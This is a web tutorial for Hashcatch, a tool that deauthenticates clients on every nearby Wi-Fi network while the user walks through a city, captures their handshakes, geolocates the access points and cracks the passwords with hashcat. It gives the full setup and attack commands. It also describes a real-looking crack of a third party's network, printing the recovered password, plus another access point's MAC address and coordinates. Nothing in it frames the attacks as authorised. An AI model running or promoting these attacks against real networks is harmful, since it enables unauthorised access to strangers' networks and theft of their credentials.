How to capture handshakes of Wi-Fi networks automatically

Programs for automatic capture of Wi-Fi handshakes

There are already several options available for automatically capturing handshakes from Wi-Fi access points, for example:

  • Besside-ng – works great, saves the file only with good handshakes, suitable for password cracking. Disadvantage: it scans the network once and, in the case of new Wi-Fi networks in the availability range, does not see them. That is, when moving around the city, this program is ineffective.
  • zizzania is the same main drawback; when new Access Points appear, it most likely does not see them. Capture efficiency is not always the best.

Hashcatch deauthenticates clients connected to all nearby Wi-Fi networks and tries to capture the handshakes. It can be used in any Linux device including Raspberry Pi and Nethunter devices so that you can capture handshakes while walking your dog. Hashcatch runs indefinitely until keyboard interrupt.

The Hashcatch script from time to time repeatedly scanning new Wi-Fi networks and add them to attack. That is, if you want to get a handshake in automatic mode, then this script can be run, simply put, not being in front of this AP, but when leaving the house. That is, the program will try to capture handshakes from all Access Points that will meet along the entire route of your way. It is clear that you need to move slowly enough, stopping in front of possible places of Wi-Fi networks congestion.

How to install Hashcatch on Kali Linux

Dependency Installation:

sudo apt install hcxtools jq

Creating the necessary folders and files for the program:

sudo mkdir -p /usr/share/hashcatch/handshakes/ /etc/hashcatch/
sudo touch /usr/share/hashcatch/db

Download script:

git clone https://github.com/staz0t/hashcatch
cd hashcatch/

Now you need to generate the configuration file, for this run the command:

sudo ./hashcatch --setup

The script will ask you for the name of the wireless interface, if you do not remember it, then use the command:

iw dev

In the future, if you need to choose a different wireless interface to use, then run the command again:

sudo ./hashcatch --setup

Or simply open the /etc/hashcatch/hashcatch.conf file with any text editor and enter the name you need.

By the way, when operating, the program saves the captured handshakes to the /usr/share/hashcatch/handshakes/ folder, and information about the APs for which it was possible to catch handshake is written to the /usr/share/hashcatch/db file. These settings are hard-coded:

If you wish, you can edit them to more convenient locations:

gedit hashcatch

To do this, replace the values of these variables:

f_config="/etc/hashcatch/hashcatch.conf"
f_db="/usr/share/hashcatch/db"
d_handshakes="/usr/share/hashcatch/handshakes/"

If you have only one Wi-Fi interface, it is recommended to close programs that may affect it:

sudo systemctl stop NetworkManager
sudo airmon-ng check kill

If the interface is down, set it to up (replace wlan0 with your interface name)

sudo ip link set wlan0 up

If you encounter the error

\033[1;33m[!] The following packages are missing. Install them and try again!\033[0m

that is, the program complains about the lack of packages, but does not report which ones, then run the following commands:

git clone https://github.com/hashcat/hashcat-utils
cd hashcat-utils/src/
make
sudo mv *.bin /usr/local/bin/
sudo cp -a *.pl /usr/local/bin/
sudo ln -s /usr/local/bin/cap2hccapx.bin /usr/local/bin/cap2hccapx

Continuous Wi-Fi Handshake Capture

Run the program:

sudo ./hashcatch

The Hashcatch program puts the interface in monitor mode a little unusual, as follows:

sudo aireplay-ng --test INTERFACE

This command does enable monitor mode, but also perform checks whether the Wi-Fi card supports wireless injection. If the test fails, then Hashcatch will quit and write that it could not be put into monitor mode. Therefore, each launch of Hashcatch requires some time and, if it did not work out the first time, it makes sense to try to launch it several more times.

Immediately after this, it will begin to search for wireless networks, then to deauthenticate clients of these networks and will try to capture handshakes.

The program will run continuously until you press CTRL+c. During operation, as well as after completion, it will be written exactly how many hashes were captured:

[*] Handshakes captured this session: 1

Location details of a router's MAC address

Access points for which handshakes are captured, Hashcatch writes to the /usr/share/hashcatch/db file to view the contents of this file:

cat /usr/share/hashcatch/db

Record Structure:

MAC_address,AP_NAME,LATITUDE,LONGITUDE,ACCURACY,TIME

Record Example:

C8:38:70:AD:BB:48,AndroidAP,55.96663351105,37.41517074071,29.982,1567406604

Values are separated by commas. By latitude and longitude, you can search on Google maps: https://www.google.com/maps/, just enter these two numbers, for example:

55.96663351105,37.41517074071

By the way, you can directly access the address of the form: https://www.google.com/maps/place/LATITUDE,LONGITUDE, for example https://www.google.com/maps/place/55.96663351105,37.41517074071

There are many Wi-Fi geolocation services, Hashcatch uses a service from Alexander Mylnikov. The API does not require a key, just enter the BSSID (MAC address) of the Access Point of interest and open a link of the form https://api.mylnikov.org/geolocation/wifi?v=1.2&bssid=BSSID, for example, https://api.mylnikov.org/geolocation/wifi?v=1.2&bssid=C8:38:70:AD:BB:48.

Ignore list

You can also add an ‘ignore’ field to mention the WiFi networks you want hashcatch to ignore while running.

If you have already captured handshakes for some wireless networks, then it makes sense to ignore them. Another example of the use of ignore list: I launched Hashcatch, put the laptop in my backpack and went for a walk, see how many handshakes I could get. In order for the computer to be constantly connected to the Internet, I created a Wi-Fi hot spot on my mobile phone and connected to it from my laptop with a second (built-in) Wi-Fi card. I needed this so that Hashcatch is able to receive coordinates for APs.

In order not to attack some APs, open the configuration file /etc/hashcatch/hashcatch.conf:

gedit /etc/hashcatch/hashcatch.conf

And add the ignore directive there and list the APs that do not need to be attacked. For example, I have this AndroidAP:

interface=wlp0s20f0u4
ignore=AndroidAP

If you want to exclude several APs, then separate them with a comma. It's okay if the names of the AP contain spaces, but there should not be spaces next to the equal sign (=) and between commas, for example:

interface=wlan0
ignore=Google Starbucks,AndroidAP

By the way, so that the computer does not turn off after some “downtime”, and does not turn off immediately after you close the lid of the laptop, you need to set the power settings correctly.

Captured Handshake Analysis

You can view the list of handshakes with the command:

ls -l /usr/share/hashcatch/handshakes/

Each handshake is placed in a separate file.

To verify them, you can run the following command:

sudo aircrack-ng /usr/share/hashcatch/handshakes/*

Hacking Wi-Fi Hashes

You can brute-force password for captured hashes by different programs, the fastest of them is Hashcat.

To start dictionary attack against Wi-Fi hash, a command of the form is used:

hashcat -m 2500 '/usr/share/hashcatch/handshakes/HASH.hccapx' DICTIONARY.txt

To start mask attack against Wi-Fi hash, a command of the form is used:

hashcat -m 2500 -a 3 '/usr/share/hashcatch/handshakes/HASH.hccapx' MASK

For example, with the following command, I launched an attack against the 14:9D:09:CF:F5:08.hccapx hash using the mask 6?d?d?d?d?d?d?d?d. This mask means 9 characters, the first of which is the number 6, and the rest can be any numbers – these are typical phone numbers for places where the handshake is captured:

hashcat -m 2500 -a 3 --hwmon-temp-abort=100 '/usr/share/hashcatch/handshakes/14:9D:09:CF:F5:08.hccapx' 6?d?d?d?d?d?d?d?d

Hacking was successful, the found Wi-Fi password is in the line:

8053b8ba46189df8b8e916053ca7bbff:149d09cff508:6cab317133a5:3BB-SAYJAI:670323273

3BB-SAYJAI is the name of the Access Point, and 670323273 is the password for it.

Additionally, continue reading about Hashcat:

Troubleshooting

Error:

[-] Could not set wireless adapter to monitor mode. Run with --setup and try again!

Means that you need to run the program with the --setup switch and then specify the name of the Wi-Fi interface.

Error:

[-] Could not set the given wireless adapter to monitor mode!

It means that the program cannot: 1) set the interface into monitor mode; or 2) cannot successfully complete the wireless injection test. If your adapter supports both monitor and wireless injection, then try starting up again.

Error:

[-] Interface not mentioned in config file. Run with --setup and try again!

It means that: 1) the Wi-Fi interface is not specified in the configuration file, or 2) the specified Wi-Fi dongle is not plugged to the computer at the moment. Therefore, plug the wireless adapter or run the program with the --setup switch to specify the name of another interface.

Please note that in BlackArch, where the program is installed from the standard repository, each update of the program deletes all previously captured handshakes, deletes the /usr/share/hashcatch/db file and erases the configuration file!

Conclusion

In general, the script is quite simple, but the task of capturing handshakes is quite simple as well, so it copes with it. I especially like the fact that each captured handshake is saved in a separate file – it is very convenient, you can immediately proceed to password brute-force.

In one of the following articles, I will talk about another excellent program for automatically capturing handshakes while constantly monitoring the emergence of new Wi-Fi networks with the addition of them to attack. In addition, that program also automatically captures PMKID!

Recommended for you:

Leave a Reply

Your email address will not be published. Required fields are marked *